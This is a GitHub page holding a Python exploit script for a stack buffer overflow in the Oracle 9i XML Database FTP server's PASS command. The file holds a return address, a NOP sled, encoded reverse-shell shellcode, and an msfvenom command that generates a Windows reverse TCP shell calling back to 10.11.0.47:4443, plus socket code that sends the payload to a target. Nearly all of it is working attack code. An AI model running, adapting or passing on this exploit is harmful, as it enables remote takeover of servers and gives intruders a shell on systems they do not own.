-
Notifications
You must be signed in to change notification settings - Fork 39
/
Copy pathoracle_9i_xdb_ftp.py
95 lines (74 loc) · 4.06 KB
/
oracle_9i_xdb_ftp.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
#!/usr/bin/python
## oracle_9i_xdb_ftp.py
##
## Name: Oracle 9i XDB FTP PASS Overflow (win32)',
## Description: By passing an overly long string to the PASScommand, a
## stack based buffer overflow occurs. David Litchfield, has
## illustrated multiple vulnerabilities inthe Oracle 9i XML
## Database (XDB), during a seminar on "Variations inexploit
## methods between Linux andWindows" presented at the Blackhat
## conference.
##
## Author: charles.holtzkampf [at] gmail.com
## WWW:www.bommachine.co.uk
## Usage: python oracle_9i_xdb_ftp.py <IP Address> <Port>
import sys, socket
rhost = sys.argv[1] ## Target IP address as command line argument
rport = int(sys.argv[2]) ## Target Port as command line argument
ret = "\x46\x6d\x61\x60" ## oraclient9.dll (pop/pop/ret)
prepend = "\x81\xc4\xff\xef\xff\xff\x44" ## following the NOP sled, but before the decoder machine code
## Max space for shell code = 800
## Bad characters according to metasploit: \x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40
## Generate payload: msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.47 LPORT=4443 EXITFUNC=thread -a x86 --platform Windows -b \x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40 -f python -v shellcode
## Payloads size = 348
shellcode = ""
shellcode += "\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e"
shellcode += "\x81\x76\x0e\x94\x8c\x91\xbd\x83\xee\xfc\xe2\xf4"
shellcode += "\x68\x64\x13\xbd\x94\x8c\xf1\x34\x71\xbd\x51\xd9"
shellcode += "\x1f\xdc\xa1\x36\xc6\x80\x1a\xef\x80\x07\xe3\x95"
shellcode += "\x9b\x3b\xdb\x9b\xa5\x73\x3d\x81\xf5\xf0\x93\x91"
shellcode += "\xb4\x4d\x5e\xb0\x95\x4b\x73\x4f\xc6\xdb\x1a\xef"
shellcode += "\x84\x07\xdb\x81\x1f\xc0\x80\xc5\x77\xc4\x90\x6c"
shellcode += "\xc5\x07\xc8\x9d\x95\x5f\x1a\xf4\x8c\x6f\xab\xf4"
shellcode += "\x1f\xb8\x1a\xbc\x42\xbd\x6e\x11\x55\x43\x9c\xbc"
shellcode += "\x53\xb4\x71\xc8\x62\x8f\xec\x45\xaf\xf1\xb5\xc8"
shellcode += "\x70\xd4\x1a\xe5\xb0\x8d\x42\xdb\x1f\x80\xda\x36"
shellcode += "\xcc\x90\x90\x6e\x1f\x88\x1a\xbc\x44\x05\xd5\x99"
shellcode += "\xb0\xd7\xca\xdc\xcd\xd6\xc0\x42\x74\xd3\xce\xe7"
shellcode += "\x1f\x9e\x7a\x30\xc9\xe4\xa2\x8f\x94\x8c\xf9\xca"
shellcode += "\xe7\xbe\xce\xe9\xfc\xc0\xe6\x9b\x93\x73\x44\x05"
shellcode += "\x04\x8d\x91\xbd\xbd\x48\xc5\xed\xfc\xa5\x11\xd6"
shellcode += "\x94\x73\x44\xed\xc4\xdc\xc1\xfd\xc4\xcc\xc1\xd5"
shellcode += "\x7e\x83\x4e\x5d\x6b\x59\x06\xd7\x91\xe4\x9b\xb6"
shellcode += "\x94\xa3\xf9\xbf\x94\x9d\xca\x34\x72\xe6\x81\xeb"
shellcode += "\xc3\xe4\x08\x18\xe0\xed\x6e\x68\x11\x4c\xe5\xb1"
shellcode += "\x6b\xc2\x99\xc8\x78\xe4\x61\x08\x36\xda\x6e\x68"
shellcode += "\xfc\xef\xfc\xd9\x94\x05\x72\xea\xc3\xdb\xa0\x4b"
shellcode += "\xfe\x9e\xc8\xeb\x76\x71\xf7\x7a\xd0\xa8\xad\xbc"
shellcode += "\x95\x01\xd5\x99\x84\x4a\x91\xf9\xc0\xdc\xc7\xeb"
shellcode += "\xc2\xca\xc7\xf3\xc2\xda\xc2\xeb\xfc\xf5\x5d\x82"
shellcode += "\x12\x73\x44\x34\x74\xc2\xc7\xfb\x6b\xbc\xf9\xb5"
shellcode += "\x13\x91\xf1\x42\x41\x37\x71\xa0\xbe\x86\xf9\x1b"
shellcode += "\x01\x31\x0c\x42\x41\xb0\x97\xc1\x9e\x0c\x6a\x5d"
shellcode += "\xe1\x89\x2a\xfa\x87\xfe\xfe\xd7\x94\xdf\x6e\x68"
user = "A" * 10 ## Creating random text for user
passwd = "B" * 442 ## Creating random text for password
jmp_short = "\xEB\x06" ## Short jump (\xEB) to an offset of 6 (\x06) according to metasploit (Rex::Arch::X86.jmp_short(6))
two_nops = "\x90\x90" ## Two NOP's as per metasploit
nops = "\x90" *(800-len(shellcode)) ## Create NOP sled to bring NOPs to 800 bytes
## Building the exploit
exploit = passwd + jmp_short + two_nops + ret + nops + prepend + shellcode
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print( "\nConnecting...")
s.connect((rhost,rport))
data = s.recv(1024)
user_send = 'USER' + user +'\r\n'
s.send(user_send.encode('utf-8'))
data = s.recv(1024)
pass_send = 'PASS ' + exploit + '\r\n'
s.send(pass_send.encode('utf-8'))
print("\nDone!")
s.close
except:
print("Could not connect to " + rhost + ":" + str(rport) + "!")